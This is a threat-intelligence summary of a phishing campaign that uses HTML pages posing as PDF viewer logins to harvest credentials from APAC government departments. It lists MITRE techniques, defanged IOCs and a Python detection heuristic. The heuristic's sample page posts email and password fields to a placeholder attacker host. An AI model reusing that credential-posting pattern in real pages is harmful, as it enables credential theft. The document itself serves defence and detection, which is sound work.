Forcepoint X-Labs reports a phishing campaign targeting APAC government departments, delivering HTML masquerading as PDF viewer login pages to harvest credentials. The HTML contains hidden tags and obfuscated JavaScript to conceal malicious activity.
#hachemi52d31 #APACGovDepartments #HTMLMasquerading #PDFViewerLogin #ForcepointXLabs #LiveFr
Keypoints
- The phishing emails imitate PDF viewer login pages to trick victims into entering their credentials.
- Email activity appears to originate from the envelope sender hachemi52d31 and targets APAC government departments.
- The fake login page HTML contains hidden tags and obfuscated JavaScript, indicating malicious intent.
- De-obfuscated JavaScript reveals credential-collection logic and an AJAX POST to a remote server.
- The code includes URL hash processing and redirect logic to a credit-card invoice page after credential submission.
- Key IOCs include the attacker email address, phishing URLs, a credit card invoice URL, and the SHA1 hash of the HTML file.
MITRE Techniques
- [T1036] Masquerading - Masquerading as a PDF viewer login page. Quote: "Masquerading as PDF Viewer Login Page"
- [T1566.001] Phishing - The phishing emails mimic PDF viewer login pages to trick victims into entering their credentials. Quote: "The phishing emails mimic PDF viewer login pages to trick victims into entering their credentials."
- [T1027] Obfuscated/Compressed Files and Information - The HTML code contains hidden tags and obfuscated JavaScript. Quote: "The HTML code of the fake login page contains hidden tags and obfuscated JavaScript, indicating malicious intent."
- [T1059.007] JavaScript - The code appears to be obfuscated JavaScript using a string array accessed via hexadecimal indices. Quote: "The code appears to be an obfuscated JavaScript. It uses an array of strings that are accessed via hexadecimal indices to mask the actual content of the code."
- [T1071.001] Web Protocols - Credential submission happens via an AJAX POST to an external URL. Quote: "If all validations pass, it sends an AJAX POST request with the email and password fields to the URL retrieved from #f."
- [T1041] Exfiltration Over C2 Channel - Credentials are posted to a phishing URL. Quote: "Credentials POSTing to a phishing URL. The URL is categorized and blocked under security classification."
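The traits listed above (hidden tags, a string array dereferenced with hex indices, an AJAX POST of the login fields, URL-hash handling and a post-submit redirect) can be turned into a triage heuristic for suspicious HTML attachments. The following is an added example, not Forcepoint's code or the actual phishing page; the regexes, the threshold of three hits and the sample HTML are assumptions, and only the SHA1 comes from the report.

```python
import hashlib
import re

# Heuristics derived from the report's description; they are assumed patterns,
# not Forcepoint's signatures, and will need tuning against real samples.
INDICATORS = {
    "hidden_tag": re.compile(r'''display\s*:\s*none|visibility\s*:\s*hidden|type\s*=\s*["']hidden''', re.I),
    # obfuscator-style string array such as _0x4a3b[0x1]
    "hex_index_array": re.compile(r'_0x[0-9a-f]{3,}\s*\[\s*0x[0-9a-f]+\s*\]', re.I),
    # jQuery-style AJAX call with an explicit POST type
    "ajax_post": re.compile(r'''\$\.ajax\s*\(\s*\{[^}]*type\s*:\s*["']POST["']''', re.I | re.S),
    "url_hash": re.compile(r'location\.hash', re.I),
    "redirect": re.compile(r'''(window\.)?location(\.href)?\s*=\s*["']https?://''', re.I),
}

# SHA1 of the HTML file as published in the report; a production scanner would
# load such values from an IOC feed rather than hard-coding them.
KNOWN_BAD_SHA1 = {"3fcae869e82602a8e809c6eb89856f81148df474"}


def score_html(html: str) -> dict:
    """Hash the file, match it against known IOCs and count heuristic hits."""
    sha1 = hashlib.sha1(html.encode("utf-8")).hexdigest()
    hits = [name for name, rx in INDICATORS.items() if rx.search(html)]
    known = sha1 in KNOWN_BAD_SHA1
    return {
        "sha1": sha1,
        "known_ioc": known,
        "hits": hits,
        # threshold is an assumption: three independent traits or a hash match
        "suspicious": known or len(hits) >= 3,
    }


# Constructed sample that only mimics the structural traits the report lists;
# the script references undefined variables and placeholder hosts and does
# nothing if rendered.
SAMPLE_HTML = """<html><body>
<div style="display:none">PDF Viewer</div>
<form id="login"><input id="email"><input id="pass" type="password"></form>
<script>
var _0x4a3b = ['post', 'https://attacker-placeholder.invalid/x.php'];
if (location.hash) { document.getElementById('email').value = location.hash.substr(1); }
$.ajax({ type: 'POST', url: _0x4a3b[0x1], data: { e: email, p: pass } });
window.location.href = 'https://invoice-placeholder.invalid/invoice.png';
</script></body></html>"""

if __name__ == "__main__":
    print(score_html(SAMPLE_HTML))
```

A hit list rather than a single verdict keeps the output useful for an analyst who wants to see which trait fired on a given attachment.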
Indicators of Compromise
- [Email Address] Attacker contact - hachemi52d31@live[.fr], potential attacker email address
- [Phishing URL] - hxxp[://]s810733[.]ha007[.]t[.]mydomain[.]zone/xille/msn-ai[.]php, hxxp[://]s810733[.]ha007[.]t[.]mydomain[.]zone/msn-ai[.]php
- [Credit Card Invoice URL] - hxxps[://]b1498432[.]smushcdn[.]com/1498432/wp-content/uploads/Credit-Card-Payment-Invoice-768×993[.]png?lossy=1&strip=1&webp=1
- [HTML SHA1] - 3fcae869e82602a8e809c6eb89856f81148df474
Read more: https://www.forcepoint.com/blog/x-labs/html-phishing-pdf-viewer-login-apac